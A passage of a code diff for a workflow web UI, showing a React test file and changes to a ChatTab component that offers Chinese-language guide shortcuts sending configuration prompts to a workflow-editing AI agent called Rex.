+        'detail.run.guideSyslogInstruction': '围绕 Syslog 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideKafkaShort': 'Kafka 接入',
+        'detail.run.guideKafkaDesc': '配置 Kafka 接入',
+        'detail.run.guideKafkaInstruction': '围绕 Kafka 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideWebhookShort': 'Webhook 接入',
+        'detail.run.guideWebhookDesc': '配置 Webhook 接入',
+        'detail.run.guideWebhookInstruction': '围绕 Webhook 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideScheduleShort': '定时触发',
+        'detail.run.guideScheduleDesc': '配置定时触发',
+        'detail.run.guideScheduleInstruction': '围绕定时触发读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+      };
+      return (translations[key] ?? key).replace(/{{(\w+)}}/g, (_match, name: string) => (
+        params?.[name] === undefined ? '' : String(params[name])
+      ));
+    },
+    i18n: { language: 'zh-CN' },
+  }),
+}));
+
+const workflow = {
+  id: 'stream_alert_denoise',
+  name: 'Stream Alert Denoise',
+  category: 'default',
+  source: 'global' as const,
+  status: 'active' as const,
+  createdAt: 0,
+  updatedAt: 0,
+  markdownContent: '',
+  workflowJson: {
+    start: 'receive_alert',
+    nodes: [],
+    edges: [],
+  },
+  stats: {
+    callCount: 0,
+    successCount: 0,
+    errorCount: 0,
+    totalRuntime: 0,
+    avgRuntime: 0,
+    thumbsUp: 0,
+    thumbsDown: 0,
+  },
+};
+
+function renderChatTab(props: Partial<ComponentProps<typeof ChatTab>> = {}) {
+  return render(
+    <MemoryRouter>
+      <ChatTab workflow={workflow} {...props} />
+    </MemoryRouter>,
+  );
+}
+
+describe('WorkflowDetail ChatTab', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    capturedSessionChatProps.length = 0;
+    capturedSessionOptions.length = 0;
+    localStorage.clear();
+    mockClientGet.mockResolvedValue({ data: {} });
+    mockCreateAndSend.mockResolvedValue(undefined);
+    mockUseAgents.mockReturnValue({
+      agents: [
+        {
+          name: 'rex',
+          description: 'Rex',
+          mode: 'primary',
+          native: true,
+          permission: [],
+          options: {},
+          skills: [],
+          tools: [],
+        },
+        {
+          name: 'explore',
+          description: 'Explore',
+          mode: 'subagent',
+          native: true,
+          permission: [],
+          options: {},
+          skills: [],
+          tools: [],
+        },
+      ],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+    mockUseProviders.mockReturnValue({
+      providers: [],
+      connectedIds: [],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+    mockDefaultModelGetResolved.mockResolvedValue({ data: { provider_id: '', model_id: '' } });
+    mockModelListDefinitions.mockResolvedValue({ data: { models: [] } });
+  });
+
+  it('passes the explicit workflow id into the AI session context', () => {
+    renderChatTab();
+
+    expect(capturedSessionOptions[0].contextMessage).toContain('工作流 ID： stream_alert_denoise');
+    expect(capturedSessionOptions[0].contextMessage).toContain('工作流目录： ~/.flocks/plugins/workflows/stream_alert_denoise/');
+    expect(capturedSessionOptions[0].contextMessage).toContain('workflow.md');
+    expect(capturedSessionOptions[0].contextMessage).toContain('guide.md');
+    expect(capturedSessionOptions[0].contextMessage).not.toContain('workflow.edit.md');
+    expect(capturedSessionOptions[0].contextMessage).toContain('workflow-config-guide');
+    expect(capturedSessionOptions[0].contextMessage).toContain('前端当前 API 清单');
+    expect(capturedSessionOptions[0].contextMessage).toContain('GET /api/workflow/stream_alert_denoise/service');
+    expect(capturedSessionOptions[0].contextMessage).toContain('DELETE /api/workflow/stream_alert_denoise/triggers/{triggerId}');
+    expect(capturedSessionOptions[0].contextMessage).toContain('server_api_token');
+    expect(capturedSessionOptions[0].contextMessage).toContain('Authorization: Bearer');
+  });
+
+  it('includes the workflow id in workflow configuration shortcut prompts', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    await user.click(screen.getByRole('button', { name: /帮我智能配置/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('工作流 ID 是 stream_alert_denoise'),
+          displayText: '@@flocks-instruction:帮我智能配置',
+        }),
+      );
+    });
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('~/.flocks/plugins/workflows/stream_alert_denoise/'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('~/.flocks/plugins/workflows/stream_alert_denoise/guide.md'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('用户点击了「帮我智能配置」按钮'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('发布配置、工作流执行配置'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('/api/workflow/stream_alert_denoise/config'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('server_api_token'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('Authorization: Bearer'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('GET /api/workflow/stream_alert_denoise/service'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('DELETE /api/workflow/stream_alert_denoise/triggers/{triggerId}'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('config.json 和 workflow.json 只能作为迁移兜底'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('后端接口不可用时必须停止配置流程'),
+      }),
+    );
+  });
+
+  it('offers focused workflow configuration questions as guide shortcuts', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    expect(screen.getByRole('button', { name: /配置输入方式/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /确认来源数据/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /设置输出去向/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /调整过滤规则/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /应用配置方案/ })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /配置输入方式/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('第一步必须读取 ~/.flocks/plugins/workflows/stream_alert_denoise/guide.md'),
+          displayText: '@@flocks-instruction:配置输入方式',
+        }),
+      );
+    });
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('用户点击了「配置输入方式」按钮'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('不要要求 guide.md 存在按钮表'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('必须调用 question 工具'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('server_api_token'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('config.json 和 workflow.json 不能直接写'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('不要追问用户要对 workflow.json 模板触发器做什么'),
+      }),
+    );
+  });
+
+  it('offers workflow editing guides in the empty workbench', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    expect(screen.getByText('Rex 辅助修改')).toBeInTheDocument();
+    expect(screen.getByText('辅助修改')).toBeInTheDocument();
+    expect(screen.getByText('辅助配置')).toBeInTheDocument();
+    expect(screen.getByText('辅助发布')).toBeInTheDocument();
+    expect(screen.getByTestId('workflow-edit-guide-scroll')).toHaveClass('overflow-y-auto');
+    expect(screen.getByRole('button', { name: /修改功能需求/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /修改节点功能/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /编辑节点实现/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /调整流程结构/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /生成工作流/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /发布为 API/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Syslog 接入/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Kafka 接入/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Webhook 接入/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /定时触发/ })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /修改节点功能/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('用户点击了「修改节点功能」按钮'),
+          displayText: '@@flocks-instruction:修改节点功能',
+        }),
+      );
+    });
+  });
+
+  it('offers publish guide shortcuts from the workflow workbench', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    await user.click(screen.getByRole('button', { name: /发布为 API/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('用户点击了「发布为 API」按钮'),
+          displayText: '@@flocks-instruction:发布为 API',
+        }),
+      );
+    });
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('围绕 API 发布读取 guide.md'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('/api/workflow/stream_alert_denoise/config'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('Authorization: Bearer'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('POST /api/workflow/stream_alert_denoise/publish'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('后端接口不可用时必须停止配置流程'),
+      }),
+    );
+  });
+
+  it('routes launch requests through the current chat instead of directly creating a new session', async () => {
+    const onLaunchRequestHandled = vi.fn();
+    setStoredSessions(workflow.id, [
+      { id: 'existing-workflow-session', title: 'Existing', createdAt: Date.now() },
+    ]);
+
+    renderChatTab({
+      launchRequest: {
+        id: 1,
+        prompt: '请引导我配置 API 发布。',
+        displayLabel: '发布为 API',
+      },
+      onLaunchRequestHandled,
+    });
+
+    await waitFor(() => {
+      expect(capturedSessionChatProps[capturedSessionChatProps.length - 1]?.sessionId).toBe('existing-workflow-session');
+      expect(mockSendPrompt).toHaveBeenCalledWith(
+        '请引导我配置 API 发布。',
+        expect.objectContaining({
+          displayText: '@@flocks-instruction:发布为 API',
+        }),
+      );
+    });
+    expect(mockClientGet).toHaveBeenCalledWith('/api/session/existing-workflow-session');
+    expect(mockReset).not.toHaveBeenCalled();
+    expect(mockCreateAndSend).not.toHaveBeenCalled();
+    expect(onLaunchRequestHandled).toHaveBeenCalledWith(1);
+  });
+
+  it('shows Rex as a read-only workflow chat agent', () => {
+    renderChatTab();
+
+    expect(capturedSessionChatProps[0].agentName).toBe('rex');
+    expect(capturedSessionChatProps[0].mentionAgents.map((agent: any) => agent.name)).toEqual(['rex']);
+    expect(capturedSessionChatProps[0].display).toEqual({
+      collapseIntermediateSteps: true,
+      processGroupsDefaultOpen: false,
+    });
+    expect(screen.getAllByText(/Rex/i).length).toBeGreaterThan(0);
+    expect(screen.queryByRole('button', { name: /Rex/i })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: /Explore/i })).not.toBeInTheDocument();
+  });
+
+  it('keeps the workflow composer compact enough for guide shortcuts above it', () => {
+    renderChatTab();
+
+    expect(capturedSessionChatProps[0].composerTextareaMinHeight).toBe(48);
+    expect(capturedSessionChatProps[0].composerTextareaMaxHeight).toBe(120);
+  });
+
+  it('keeps workflow guide descriptions behind info tooltips', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    expect(screen.getByRole('button', { name: /帮我智能配置/ })).toBeInTheDocument();
+    expect(screen.queryByText('配置工作流')).not.toBeInTheDocument();
+
+    const infoIcon = screen.getAllByRole('img', { name: '帮我智能配置说明' })[0];
+    await user.hover(infoIcon);
+
+    expect(await screen.findByText('配置工作流')).toBeInTheDocument();
+
+    await user.unhover(infoIcon);
+    await waitFor(() => {
+      expect(screen.queryByText('配置工作流')).not.toBeInTheDocument();
+    });
+  });
+
+  it('refreshes after a tool finishes when workflow.md content changed without updatedAt changing', async () => {
+    const updatedWorkflow = {
+      ...workflow,
+      updatedAt: workflow.updatedAt,
+      markdownContent: '# AI edited markdown\n',
+    };
+    vi.mocked(workflowAPI.get).mockResolvedValueOnce({ data: updatedWorkflow } as any);
+    const onWorkflowUpdated = vi.fn();
+
+    renderChatTab({
+      workflow: { ...workflow, markdownContent: '# old markdown\n' },
+      onWorkflowUpdated,
+    });
+
+    capturedSessionChatProps[0].onSSEEvent({
+      type: 'message.part.updated',
+      properties: {
+        part: {
+          type: 'tool',
+          tool: 'apply_patch',
+          state: { status: 'completed' },
+        },
+      },
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.get).toHaveBeenCalledWith('stream_alert_denoise');
+      expect(onWorkflowUpdated).toHaveBeenCalledWith(updatedWorkflow);
+    });
+  });
+});
diff --git a/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx b/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx
index 8926b6c79..fec66f1ea 100644
--- a/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx
@@ -1,12 +1,26 @@
 import { useState, useEffect, useRef, useCallback } from 'react';
 import { useTranslation } from 'react-i18next';
-import { AlertCircle, FolderOpen, Plus, Clock } from 'lucide-react';
-import SessionChat, { NodeRef, type SSEChatEvent } from '@/components/common/SessionChat';
+import { AlertCircle, Bot, Clock, Plus } from 'lucide-react';
+import SessionChat, {
+  NodeRef,
+  buildInstructionDisplayText,
+  type PromptDisplayOptions,
+  type SSEChatEvent,
+} from '@/components/common/SessionChat';
+import {
+  ChatAgentDisplay,
+  ChatModelPicker,
+  useChatAgentOptions,
+  useChatModelOptions,
+} from '@/components/common/ChatPromptSelectors';
+import ChatGuideDock, { type ChatGuideAction } from '@/components/common/ChatGuideDock';
+import GuideInfoIcon from '@/components/common/GuideInfoIcon';
 import { useSessionChat } from '@/hooks/useSessionChat';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
 import type { ImagePartData } from '@/utils/imageUpload';
-import { workflowAPI, Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
+import { workflowAPI, workflowAPIEndpoints, Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
 import { formatSessionDate } from '@/utils/time';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 import client from '@/api/client';
 import {
   getStoredSessions,
@@ -16,17 +30,57 @@ import {
 } from '../sessionStorage';
 
 const FALLBACK_POLL_MS = 30_000;
+const WORKFLOW_CONFIG_SKILL_NAME = 'workflow-config-guide';
+const WORKFLOW_CHAT_AGENT_NAME = 'rex';
+const WORKFLOW_CHAT_AGENT_NAMES = [WORKFLOW_CHAT_AGENT_NAME];
+const WORKFLOW_GUIDE_FILE_NAME = 'guide.md';
+
+function formatWorkflowAPIEndpoints(id: string): string {
+  return JSON.stringify(workflowAPIEndpoints(id), null, 2);
+}
+
+type TranslateFn = (key: string, params?: Record<string, unknown>) => string;
+
+function workflowRevisionKey(workflow: Workflow): string {
+  return [
+    workflow.updatedAt,
+    workflow.markdownContent ?? workflow.editMarkdownContent ?? '',
+    JSON.stringify(workflow.workflowJson),
+  ].join('\u0000');
+}
+
+type WorkflowPromptParams = Record<string, unknown> & {
+  backendConfigAccessGuide: string;
+};
+
+function withBackendConfigAccessGuide(
+  t: TranslateFn,
+  params: Record<string, unknown>,
+): WorkflowPromptParams {
+  return {
+    ...params,
+    backendConfigAccessGuide: t('detail.chat.backendConfigAccessGuide', params),
+  };
+}
 
 // ─────────────────────────────────────────────
 // ChatTab
 // ─────────────────────────────────────────────
 
+export interface WorkflowChatLaunchRequest {
+  id: number;
+  prompt: string;
+  displayLabel?: string;
+}
+
 interface ChatTabProps {
   workflow: Workflow;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
   onWorkflowUpdated?: (updated: Workflow) => void;
   onFirstMessageSent?: () => void;
   onSessionChange?: (sessionId: string | null) => void;
+  launchRequest?: WorkflowChatLaunchRequest | null;
+  onLaunchRequestHandled?: (id: number) => void;
   selectedNode?: WorkflowNode | null;
   onNodeRefDismiss?: () => void;
 }
@@ -37,24 +91,63 @@ export default function ChatTab({
   onWorkflowUpdated,
   onFirstMessageSent,
   onSessionChange,
+  launchRequest,
+  onLaunchRequestHandled,
   selectedNode,
   onNodeRefDismiss,
 }: ChatTabProps) {
-  const { t } = useTranslation('workflow');
-  const supportsVision = useDefaultModelVision();
+  const { t, i18n } = useTranslation('workflow');
+  const workflowDisplayName = getWorkflowDisplayName(workflow, i18n?.language);
+  const defaultSupportsVision = useDefaultModelVision();
   const [activeSessionId, setActiveSessionId] = useState<string | null>(null);
   const [initialMessage, setInitialMessage] = useState<string | null>(null);
   const [sessions, setSessions] = useState<StoredSession[]>([]);
   const [showHistory, setShowHistory] = useState(false);
+  const [sessionsHydrated, setSessionsHydrated] = useState(false);
   const hasCreatedRef = useRef(false);
-  const lastUpdatedAtRef = useRef<number>(workflow.updatedAt);
+  const workflowRevisionRef = useRef<string>(workflowRevisionKey(workflow));
   const workflowIdRef = useRef<string>(workflow.id);
   workflowIdRef.current = workflow.id;
   const historyBtnRef = useRef<HTMLDivElement>(null);
+  const { agents: workflowChatAgents } = useChatAgentOptions({
+    allowedAgentNames: WORKFLOW_CHAT_AGENT_NAMES,
+  });
+  const {
+    groupedOptions: groupedChatModelOptions,
+    loading: loadingChatModels,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  } = useChatModelOptions();
+  const effectiveSupportsVision = selectedModelOption?.supportsVision ?? defaultSupportsVision;
+
+  useEffect(() => {
+    workflowRevisionRef.current = workflowRevisionKey(workflow);
+  }, [workflow]);
 
   const workflowDir = workflow.source === 'global'
     ? `~/.flocks/plugins/workflows/${workflow.id}/`
     : `.flocks/plugins/workflows/${workflow.id}/`;
+  const workflowMdPath = `${workflowDir}workflow.md`;
+  const workflowGuidePath = `${workflowDir}${WORKFLOW_GUIDE_FILE_NAME}`;
+  const endpoints = workflowAPIEndpoints(workflow.id);
+  const workflowConfigEndpoint = endpoints.config.read.replace(/^GET /, '');
+  const workflowChatPromptParams = withBackendConfigAccessGuide(t, {
+    id: workflow.id,
+    name: workflowDisplayName,
+    category: workflow.category,
+    dir: workflowDir,
+    mdPath: workflowMdPath,
+    jsonPath: `${workflowDir}workflow.json`,
+    guidePath: workflowGuidePath,
+    configSkillName: WORKFLOW_CONFIG_SKILL_NAME,
+    configEndpoint: workflowConfigEndpoint,
+    configSyncEndpoint: endpoints.config.syncFallback.replace(/^POST /, ''),
+    publishEndpoint: endpoints.apiService.publish.replace(/^POST /, ''),
+    unpublishEndpoint: endpoints.apiService.unpublish.replace(/^POST /, ''),
+    triggersEndpoint: endpoints.triggers.list.replace(/^GET /, ''),
+    apiEndpoints: formatWorkflowAPIEndpoints(workflow.id),
+  });
 
   const {
     sessionId: hookSessionId,
@@ -64,15 +157,12 @@ export default function ChatTab({
     createAndSend: createAndSendSession,
     reset: resetSession,
   } = useSessionChat({
-    title: t('detail.chat.sessionTitle', { name: workflow.name }),
+    title: t('detail.chat.sessionTitle', { name: workflowDisplayName }),
     category: 'workflow',
-    contextMessage: t('detail.chat.contextMessage', {
-      name: workflow.name,
-      category: workflow.category,
-      dir: workflowDir,
-      mdPath: `${workflowDir}workflow.md`,
-      jsonPath: `${workflowDir}workflow.json`,
-    }),
+    contextMessage: [
+      t('detail.chat.contextMessage', workflowChatPromptParams),
+      workflowChatPromptParams.backendConfigAccessGuide,
+    ].join('\n\n'),
   });
 
   const sessionId = activeSessionId || hookSessionId;
@@ -83,9 +173,14 @@ export default function ChatTab({
 
   // Load stored sessions and validate only the active one (lightweight check)
   useEffect(() => {
+    let cancelled = false;
+    setSessionsHydrated(false);
     const stored = getStoredSessions(workflow.id);
     if (stored.length === 0) {
       setSessions([]);
+      setActiveSessionId(null);
+      hasCreatedRef.current = false;
+      setSessionsHydrated(true);
       return;
     }
 
@@ -97,7 +192,9 @@ export default function ChatTab({
     (async () => {
       try {
         await client.get(`/api/session/${stored[0].id}`);
+        if (cancelled) return;
       } catch {
+        if (cancelled) return;
         // First session is gone — try to find a valid one
         const valid: StoredSession[] = [];
         for (const s of stored.slice(1)) {
@@ -115,8 +212,15 @@ export default function ChatTab({
           setActiveSessionId(null);
           hasCreatedRef.current = false;
         }
+      } finally {
+        if (!cancelled) {
+          setSessionsHydrated(true);
+        }
       }
     })();
+    return () => {
+      cancelled = true;
+    };
   }, [workflow.id]);
 
   // Save newly created session to localStorage
@@ -124,12 +228,12 @@ export default function ChatTab({
     if (!hookSessionId) return;
     const newSession: StoredSession = {
       id: hookSessionId,
-      title: t('detail.chat.sessionTitle', { name: workflow.name }),
+      title: t('detail.chat.sessionTitle', { name: workflowDisplayName }),
       createdAt: Date.now(),
     };
     pushStoredSession(workflow.id, newSession);
     setSessions(getStoredSessions(workflow.id));
-  }, [hookSessionId, workflow.id, workflow.name]);
+  }, [hookSessionId, workflow.id, workflowDisplayName, t]);
 
   // Close history dropdown on outside click
   useEffect(() => {
@@ -145,19 +249,34 @@ export default function ChatTab({
 
   // First message — via SessionChat's onCreateAndSend callback
   const handleCreateAndSend = useCallback(
-    async (text: string, imageParts?: ImagePartData[]) => {
+    async (
+      text: string,
+      imageParts?: ImagePartData[],
+      agentOverride?: string,
+      modelOverride?: { providerID: string; modelID: string } | null,
+      options?: PromptDisplayOptions,
+    ) => {
       const hasImages = (imageParts?.length ?? 0) > 0;
       // Allow image-only messages (no text) to flow through.
       if (hasCreatedRef.current || (!text.trim() && !hasImages)) return;
       hasCreatedRef.current = true;
       onFirstMessageSent?.();
+      const effectiveAgent = agentOverride || WORKFLOW_CHAT_AGENT_NAME;
+      const effectiveModel = modelOverride === undefined ? selectedPromptModel : modelOverride;
+      const effectiveDisplayText = options?.displayText;
 
       try {
-        if (hasImages) {
+        if (hasImages || effectiveDisplayText) {
           // initialMessage is text-only; use createAndSend so the inline
           // image parts survive into the very first prompt instead of being
           // silently dropped (the previous bug for non-Session composers).
-          await createAndSendSession({ text, imageParts });
+          await createAndSendSession({
+            text,
+            imageParts,
+            agent: effectiveAgent,
+            model: effectiveModel,
+            displayText: effectiveDisplayText,
+          });
         } else {
           setInitialMessage(text);
           await createSession();
@@ -167,7 +286,16 @@ export default function ChatTab({
         setInitialMessage(null);
       }
     },
-    [onFirstMessageSent, createSession, createAndSendSession],
+    [onFirstMessageSent, selectedPromptModel, createSession, createAndSendSession],
+  );
+
+  const handleWelcomeGuidePrompt = useCallback(
+    (prompt: string, label: string) => {
+      void handleCreateAndSend(prompt, [], undefined, undefined, {
+        displayText: buildInstructionDisplayText(label),
+      });
+    },
+    [handleCreateAndSend],
   );
 
   const handleNewSession = useCallback(() => {
@@ -191,8 +319,9 @@ export default function ChatTab({
     try {
       const res = await workflowAPI.get(workflowIdRef.current);
       const fresh = res.data;
-      if (fresh.updatedAt > lastUpdatedAtRef.current) {
-        lastUpdatedAtRef.current = fresh.updatedAt;
+      const nextRevision = workflowRevisionKey(fresh);
+      if (nextRevision !== workflowRevisionRef.current) {
+        workflowRevisionRef.current = nextRevision;
         onWorkflowUpdated(fresh);
       }
     } catch { /* ignore */ }
@@ -207,12 +336,14 @@ export default function ChatTab({
   const handleSSEEvent = useCallback(
     (event: SSEChatEvent) => {
       const { type, properties } = event;
+      const toolPart = (
+        type === 'message.part.updated' && properties?.part?.type === 'tool'
+      ) ? properties.part : null;
       if (
-        type === 'message.part.updated'
-        && properties?.part?.type === 'tool'
-        && properties.part.tool === 'run_workflow'
+        toolPart
+        && toolPart.tool === 'run_workflow'
       ) {
-        const state = properties.part.state as Record<string, any> | undefined;
+        const state = toolPart.state as Record<string, any> | undefined;
         const metadata = (state?.metadata ?? {}) as Record<string, any>;
         const workflowId = metadata.workflow_id;
         if (
@@ -236,9 +367,17 @@ export default function ChatTab({
             currentNodeType: metadata.current_node_type,
             currentPhase: metadata.phase,
             currentStepIndex: metadata.step_index,
+            stepCount: metadata.step_count,
+            loopProgress: metadata.loop_progress,
           });
         }
       }
+      if (toolPart) {
+        const state = toolPart.state as Record<string, any> | undefined;
+        if (state?.status === 'completed' || state?.status === 'error') {
+          void checkWorkflowUpdate();
+        }
+      }
       if (!onWorkflowUpdated) return;
       if (
         (type === 'workflow.updated' || type === 'workflow.created') &&
@@ -253,11 +392,10 @@ export default function ChatTab({
   // Fallback: low-frequency polling for filesystem-driven changes (Rex writes directly)
   useEffect(() => {
     if (!sessionId || !onWorkflowUpdated) return;
-    lastUpdatedAtRef.current = workflow.updatedAt;
 
     const timer = setInterval(checkWorkflowUpdate, FALLBACK_POLL_MS);
     return () => clearInterval(timer);
-  }, [sessionId, workflow.id, workflow.updatedAt, onWorkflowUpdated, checkWorkflowUpdate]);
+  }, [sessionId, workflow.id, onWorkflowUpdated, checkWorkflowUpdate]);
 
   const nodeRef: NodeRef | null = selectedNode
     ? { id: selectedNode.id, type: selectedNode.type, description: selectedNode.description }
@@ -329,14 +467,63 @@ export default function ChatTab({
           live={!!sessionId}
           placeholder={t('detail.chat.inputPlaceholder')}
           className="h-full"
+          display={{ collapseIntermediateSteps: true, processGroupsDefaultOpen: false }}
+          agentName={WORKFLOW_CHAT_AGENT_NAME}
+          mentionAgents={workflowChatAgents}
           nodeRef={nodeRef}
           onNodeRefDismiss={onNodeRefDismiss}
           onStreamingDone={handleStreamingDone}
           initialMessage={initialMessage}
           onSSEEvent={handleSSEEvent}
-          supportsVision={supportsVision}
+          supportsVision={effectiveSupportsVision}
+          contextWindowTokens={selectedModelOption?.contextWindowTokens ?? null}
+          model={selectedPromptModel}
           onCreateAndSend={!sessionId ? handleCreateAndSend : undefined}
-          welcomeContent={!sessionId ? <WorkflowWelcome workflow={workflow} error={error} onRetry={() => { hasCreatedRef.current = false; resetSession(); }} /> : undefined}
+          composerTextareaMinHeight={48}
+          composerTextareaMaxHeight={120}
+          toolbarSlot={
+            <ChatAgentDisplay
+              agents={workflowChatAgents}
+              selectedAgent={WORKFLOW_CHAT_AGENT_NAME}
+            />
+          }
+          centerToolbarSlot={
+            <ChatModelPicker
+              groupedOptions={groupedChatModelOptions}
+              loading={loadingChatModels}
+              selectedModelOption={selectedModelOption}
+              onSelectModel={(option) => setSelectedModelKey(option.key)}
+            />
+          }
+          conversationBottomSlot={({ sendPrompt, sending, streaming }) => (
+            <>
+              <WorkflowLaunchRequestRunner
+                launchRequest={launchRequest}
+                enabled={sessionsHydrated}
+                onLaunchRequestHandled={onLaunchRequestHandled}
+                onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+                  displayText: label ? buildInstructionDisplayText(label) : undefined,
+                })}
+              />
+              {sessionId || sending || streaming ? (
+                <WorkflowGuideDock
+                  workflow={workflow}
+                  disabled={sending || streaming}
+                  onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+                    displayText: buildInstructionDisplayText(label),
+                  })}
+                />
+              ) : null}
+            </>
+          )}
+          welcomeContent={!sessionId ? (
+            <WorkflowWelcome
+              workflow={workflow}
+              error={error}
+              onRetry={() => { hasCreatedRef.current = false; resetSession(); }}
+              onStartPrompt={handleWelcomeGuidePrompt}
+            />
+          ) : undefined}
         />
       </div>
     </div>
@@ -351,60 +538,58 @@ function WorkflowWelcome({
   workflow,
   error,
   onRetry,
+  onStartPrompt,
 }: {
   workflow: Workflow;
   error: string | null;
   onRetry: () => void;
+  onStartPrompt: (prompt: string, label: string) => void;
 }) {
-  const { t } = useTranslation('workflow');
-  const workflowDir = workflow.source === 'global'
-    ? `~/.flocks/plugins/workflows/${workflow.id}/`
-    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const { t, i18n } = useTranslation('workflow');
+  const workflowDisplayName = getWorkflowDisplayName(workflow, i18n?.language);
+  const guideGroups = buildWorkflowGuideGroups(t, workflow);
 
   return (
-    <div className="w-full max-w-md space-y-4 text-left">
-      <div className="text-xs text-gray-700 space-y-2">
-        <p className="font-semibold text-gray-900">{t('detail.chat.welcome.title', { name: workflow.name })}</p>
-        <p className="text-gray-500 leading-relaxed">
-          {t('detail.chat.welcome.descPart1')}
